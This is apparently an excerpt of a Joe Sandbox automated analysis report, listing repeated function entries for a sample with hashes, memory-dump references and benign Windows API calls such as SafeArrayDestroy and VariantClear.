Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 1ea5bce6490ad4b8d0395a8d9f6bf58d341d72be95c79e1f3c027c0a61de73c1
Instruction ID: ba6e2c95a945e627516cbc8fe4b93c5e5f56b929eba3234c26c4c9f6a087235c
Opcode Fuzzy Hash: 1ea5bce6490ad4b8d0395a8d9f6bf58d341d72be95c79e1f3c027c0a61de73c1
Instruction Fuzzy Hash: 9D313970B016189FCB10DFA9CD80B9EB7BDAF99214F20858AE419E7651CB75E981CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6C90C150 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6C90C180
SafeArrayPutElement.OLEAUT32(00000000,6C903749,?), ref: 6C90C1B8
VariantClear.OLEAUT32(?), ref: 6C90C1C4
VariantCopy.OLEAUT32(6C903749,?), ref: 6C90C21B
VariantClear.OLEAUT32(?), ref: 6C90C22F
SafeArrayDestroy.OLEAUT32(00000000), ref: 6C90C23E

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafeVariant$Clear$CopyCreateDestroyElementVector
String ID:
API String ID: 3979206172-0
Opcode ID: a655191e0cb8cf7371e4afad52f8f5c2c84caf4aef44595dada348b837afa779
Instruction ID: bb1947c1ccca6efe24b947d96f96c29ecea3255ee5eea673fde1299d3a3d4002
Opcode Fuzzy Hash: a655191e0cb8cf7371e4afad52f8f5c2c84caf4aef44595dada348b837afa779
Instruction Fuzzy Hash: 73315D75A04249AFDB00DFE9C894FAEBBB8EF5A304F108519E915D7790EB30D901CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F7370 Relevance: 9.1, APIs: 6, Instructions: 96COMMON

Download Yara Rule

APIs

Part of subcall function 6C949BB5: _malloc.LIBCMT ref: 6C949BCF

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,6C9611FD,000000FF,?,6C8F8B80,00000000,?,00000000,?,6C8F8C13,?,?), ref: 6C8F7415
InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000,6C9611FD,000000FF,?,6C8F8B80,00000000,?,00000000,?,6C8F8C13,?,?), ref: 6C8F741B
std::exception::exception.LIBCMT ref: 6C8F743D
__CxxThrowException@8.LIBCMT ref: 6C8F7452
std::exception::exception.LIBCMT ref: 6C8F7461
__CxxThrowException@8.LIBCMT ref: 6C8F7476

Part of subcall function 6C949BB5: std::exception::exception.LIBCMT ref: 6C949C04
Part of subcall function 6C949BB5: std::exception::exception.LIBCMT ref: 6C949C1E
Part of subcall function 6C949BB5: __CxxThrowException@8.LIBCMT ref: 6C949C2F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$CriticalInitializeSection$_malloc
String ID:
API String ID: 189561132-0
Opcode ID: da0d993c31867d3b5001fb9b9b554eba198f44528e5fee6388cd6a72c42745d6
Instruction ID: a1231c9225c20087077a3fb146d31419d2feec097e1926930da50e68abc8f859
Opcode Fuzzy Hash: da0d993c31867d3b5001fb9b9b554eba198f44528e5fee6388cd6a72c42745d6
Instruction Fuzzy Hash: 4F3199B29016449FC760CF59C880A9AFBF8FF69210B55896EE85A87B40D730E504CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C908C6E Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 0343a8a33727bfbbf89f0b99480f565681a89958e613edddeb0cc21ad6ddee17
Instruction ID: c19bad8d42cf9dccb5ba0aa550e142625e14782ce7fbd78ab5d9150ab6e9783d
Opcode Fuzzy Hash: 0343a8a33727bfbbf89f0b99480f565681a89958e613edddeb0cc21ad6ddee17
Instruction Fuzzy Hash: 6B314C70F016189FDB10DB69CC80B9EB7BEAF99204F24869AE419E7641CB71ED81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C908D72 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: ec9ba93f0fa6f7548a7201d7c95d201e5764eaeb04d532c5066fb67a17925388
Instruction ID: f5f3e5164ddc892a1a305f5cdc39ab12014ca2acd18dc2feba48f99b5d459de3
Opcode Fuzzy Hash: ec9ba93f0fa6f7548a7201d7c95d201e5764eaeb04d532c5066fb67a17925388
Instruction Fuzzy Hash: DD312970B016189FCB10CBA9CC84B9EB7BDAF99204F24868AE419E7645DB71E981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C908E8E Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 7a87ef016efc61b19ed210d68aec8059e340fb5aa4dac2428cde81dfa470d5f3
Instruction ID: f1241602b61a63b930294e17b29fc9bcbb7b654c1cfd0230054830bf3ecbce59
Opcode Fuzzy Hash: 7a87ef016efc61b19ed210d68aec8059e340fb5aa4dac2428cde81dfa470d5f3
Instruction Fuzzy Hash: E2312970F016189FDB10DBA9CC84B9EB7BDAF99204F24868AE419E7645CB71E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C908F07 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 2a9896c21a5f06678f3537f1c026fdba8bddc61907ce97e2fc56148a015d6c31
Instruction ID: 0009e0ddf8843c2d1eecf879bfa94cccd52a73b1b37be86aa3fa10468d3574d5
Opcode Fuzzy Hash: 2a9896c21a5f06678f3537f1c026fdba8bddc61907ce97e2fc56148a015d6c31
Instruction Fuzzy Hash: BE312970B016189FDB10DBA9CC80B9EB7BEAF99304F24869AE519E7641CB71ED41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C90884F Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 05a2ada74095ab040be6743eb3694dbfee0c4ffd78d5908b223deebb7eb5f72f
Instruction ID: 0f60116896c2a3edfe2bd0a07af83d848ca9f8c05f536423c1e9b948bcb03fc4
Opcode Fuzzy Hash: 05a2ada74095ab040be6743eb3694dbfee0c4ffd78d5908b223deebb7eb5f72f
Instruction Fuzzy Hash: B8312C70F016189FDB10CBA9CD80B9EB7BEAF99604F24868AE419E7641CB75ED41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C908B64 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90AEBF

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 4756d0730d8ebc3710947c07b2ed36bf8a3aa3596b8643d608572a3c8846c7ec
Instruction ID: 1287449c96ebd090b4f16be5c4970680e3c8905ab72b024aae19b6e5757fefa7
Opcode Fuzzy Hash: 4756d0730d8ebc3710947c07b2ed36bf8a3aa3596b8643d608572a3c8846c7ec
Instruction Fuzzy Hash: 95314C71F016189FCB10DBA9CC80B9EB7BDAF99204F24868AE419E7641CB75ED41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C900561 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C9023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90240F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 980f8cebf934f069ee293e39cbaebeebcecc3f0c306f893a10eada336cd17782
Instruction ID: 5ebcf89ff0967b8c20237186ae413438e7fedfc1cef92714cd6ae59d27d2dcc9
Opcode Fuzzy Hash: 980f8cebf934f069ee293e39cbaebeebcecc3f0c306f893a10eada336cd17782
Instruction Fuzzy Hash: DD3149B0F01A189FCB10DFA9CD84B9DB7BEAF99604F20858AE518E7642C771D9808F50

Uniqueness

Uniqueness Score: -1.00%

Function 6C9000B4 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C9023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90240F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 4756d0730d8ebc3710947c07b2ed36bf8a3aa3596b8643d608572a3c8846c7ec
Instruction ID: c2cb1cd2ac0ea098b06239bcca124cde6b88d7399f613cbab866815a23c367ab
Opcode Fuzzy Hash: 4756d0730d8ebc3710947c07b2ed36bf8a3aa3596b8643d608572a3c8846c7ec
Instruction Fuzzy Hash: 923129B0B01A189FCB10DFA9CC84B9DB7BEAF99704F24859AE418E7641CB71D981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C9001BE Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C9023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90240F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 0343a8a33727bfbbf89f0b99480f565681a89958e613edddeb0cc21ad6ddee17
Instruction ID: 907add21466472a544166e9965f57dea4180e1503c3dc99b674e88e084153d88
Opcode Fuzzy Hash: 0343a8a33727bfbbf89f0b99480f565681a89958e613edddeb0cc21ad6ddee17
Instruction Fuzzy Hash: 82314BB0F01A189FDB10DFA9CC84B9DB7BEAF95204F24859AE418E7641C771D9818F50

Uniqueness

Uniqueness Score: -1.00%

Function 6C9002C2 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C9023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90240F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: ec9ba93f0fa6f7548a7201d7c95d201e5764eaeb04d532c5066fb67a17925388
Instruction ID: f9308fd9a629a2102e4b1509132ff983164702364e7f182e26026e916930f30d
Opcode Fuzzy Hash: ec9ba93f0fa6f7548a7201d7c95d201e5764eaeb04d532c5066fb67a17925388
Instruction Fuzzy Hash: 75314BB0B01A189FCB10CFA9CC84B9DB7BDAF99204F60869EE418E7641C771D981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6C9003DE Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6C9023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90240F

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
